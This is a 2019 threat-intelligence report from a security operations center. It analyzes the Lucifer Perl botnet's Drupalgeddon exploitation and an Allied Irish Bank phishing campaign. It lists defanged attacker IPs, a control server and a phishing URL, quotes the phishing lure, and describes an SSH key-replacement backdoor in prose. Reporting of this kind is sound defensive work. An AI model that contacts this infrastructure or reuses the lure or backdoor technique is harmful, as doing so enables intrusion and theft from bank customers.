Wednesday October 30th 2019
In this week’s threat report, we have a spooky threat actor just in time for Halloween. The Perch Security Operations Center (SOC) has discovered a threat campaign targeting a number of unpatched Drupal servers and other vulnerable web-server workloads in the United States in September. After analyzing the related malware that was building a botnet, they are ready to report. The Lucifer botnet was leveraged to send phishing emails taking advantage of a change in EU financial service regulations.
Lucifer has announced his campaign for the 2020 malware race with a barrage of Drupal exploits which we’ve been monitoring in the Perch SOC. During the September campaign, Perch SOC observed Lucifer spraying Drupalgeddon exploits from the IPs 193[.]56[.]28[.]142, 193[.]56[.]28[.]61, and 208[.]86[.]115[.]95 that upon success, would download the Lucifer Perl Bot as ‘plaintext.txt’ from the control server at 193[.]56[.]28[.]142 and connect to an IRC command and control server to receive additional commands from Lucifer operators.
There are more than 1.2M sites using Drupal and based on reports from earlier in the year many thousands of those sites remain vulnerable to recent exploits.
In addition to the large amount of Drupal exploits attempted, Lucifer was also scanning for cPanel Web Hosting Manager (WHM), likely collecting targets for a recent Exim vulnerability. The main target for Lucifer appears to be linux and unix Web servers.
This isn’t Lucifer’s first campaign, but the techniques and capabilities have grown since the initial 2018 campaign. Previously, Lucifer was scanning for a number of router and IoT vulnerabilities, to install a Perl-based bot that connected to IRC command and control infrastructure. Lucifer had a number of functions at that time to allow operators to send mail, perform DDoS, install Crypto miners, and kill other Crypto miners that may already be running on vulnerable systems.
For the 2020 campaign, Lucifer is up to those same tricks, but also added functions for port scanning, launching newly bundled exploits, and allowing SSH to infected hosts. Additionally, there are comments in the source code that show new features are on the way. Lucifer is actively developing the Perl bot for future campaigns.
If you’d like to support the development of Lucifer, they have added a new Bitcoin address for donations. At the time of writing this, Lucifer has not received any donations, but you can check the history of this Bitcoin address to see if that has changed.
Although the sending emails is not a new feature for Lucifer, Perch researchers found evidence from a mail setup file that hints to Lucifer’s motives. When Lucifer commands bots to send emails, an html message was included instructing users to setup their Security Customer Authentication (SCA) for their online bank account. “We inform you that your SCA is not setup. In order to use your Online Banking Services, you will have 24 hours to setup your SCA.” The email reported itself to be from Karen Davis of Allied Irish Bank (AIB) Security Department.
AIB is one of the “Big Four” commercial banks in Ireland and offers a full range of personal and corporate banking services. In order to comply with the 2nd Payment Service Direct EU law (PSD2), AIB released a notice on September 14th that customers would be required to setup SCA to maintain access to their banking account online.
Lucifer took advantage of this change in EU banking regulations to kick off the email phishing campaign linking users to a compromised Australian site, http://eumundioriginals[.]com[.]au/css/aib/random.aspx, which hosted code to phish AIB customer login information. Presumably, Lucifer was attempting to access AIB customer accounts and steal funds before users had setup SCA.
One of Lucifer’s new features, called ‘Auth Mode’, allows the threat actor to establish an SSH session on infected hosts by fetching an authorized key from the control infrastructure and replacing the system’s authorized keys with keys generated by Lucifer. By doing this the threat actor gains SSH access to infected hosts using an SSH key for authentication.
Another new feature added in this version of Lucifer is port scanning. This function is used to build a target list for launching additional exploits to grow the botnet.
Many of the functions and variable names Lucifer uses are Portuguese, so we expect that the author is either from Portugal or a country where Portuguese is widely spoken, like Angola, Brazil, Cape Verde, East Timor, Equatorial Guinea, Guinea-Bissau, Mozambique, or São Tomé and Príncipe. The fact that an Irish bank was targeted, and that Lucifer is familiar with regulation changes for EU banks, reinforces the idea that the operator is from the region.